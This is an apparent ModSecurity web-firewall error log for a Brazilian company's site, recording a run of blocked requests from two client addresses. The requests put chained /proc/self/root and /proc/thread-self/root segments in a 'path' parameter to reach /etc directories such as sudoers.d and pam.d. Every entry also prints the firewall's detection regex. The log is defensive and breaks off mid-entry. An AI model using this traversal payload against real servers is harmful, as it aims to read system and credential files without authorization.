https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:56.479289 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:53144] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7uKQpVkWug9HeOt9VIQAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:57.782823 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.241.46:53154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7uaTCbgAP5jq5TehMnAAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:58.888803 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.241.46:45768] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7ukr9dMAiw-8KANNqWgAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:01.750956 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:45782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7vbABkC4fWIHEf8EZswAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:03.047272 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:45792] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7v6TCbgAP5jq5TehMnQAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:04.203698 2026] [:error] [pid 14895:tid 140411641214720] [client 74.7.241.46:45802] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7wFajLEzk2WiQ-100HAAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:06.606619 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.241.46:45814] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7wlajLEzk2WiQ-100HgAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:07.917497 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.241.46:45830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7w6TCbgAP5jq5TehMngAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:09.086400 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.241.46:55884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7xaTCbgAP5jq5TehMoAAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:10.447266 2026] [:error] [pid 15568:tid 140411565680384] [client 74.7.241.46:55890] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7xqQpVkWug9HeOt9VIwAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:11.788885 2026] [:error] [pid 29802:tid 140411574073088] [client 74.7.241.46:55900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7x8_BxrYCr4hPDw8L3gAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:13.093887 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.241.46:55906] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7yc_BxrYCr4hPDw8L4QAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:15.595663 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:55914] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7ys_BxrYCr4hPDw8L5AAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:16.879305 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.241.46:55930] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7zFajLEzk2WiQ-100IAAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:18.046600 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:54004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7zv9ocpUE4ed4uDwVJgAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:19.383853 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:54014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7z6TCbgAP5jq5TehMpAAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:20.245603 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:55964] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh70NSswJuvopo3lOiB3gAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:53:20.679025 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:54024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh70LABkC4fWIHEf8EZvQAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:53:39.689744 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.243.203:54014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh740r9dMAiw-8KANNqegAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:54:02.436676 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.243.203:49118] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7-VajLEzk2WiQ-100PwAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:54:09.664325 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.243.203:59442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8AVajLEzk2WiQ-100RQAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:54:49.863691 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:54034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 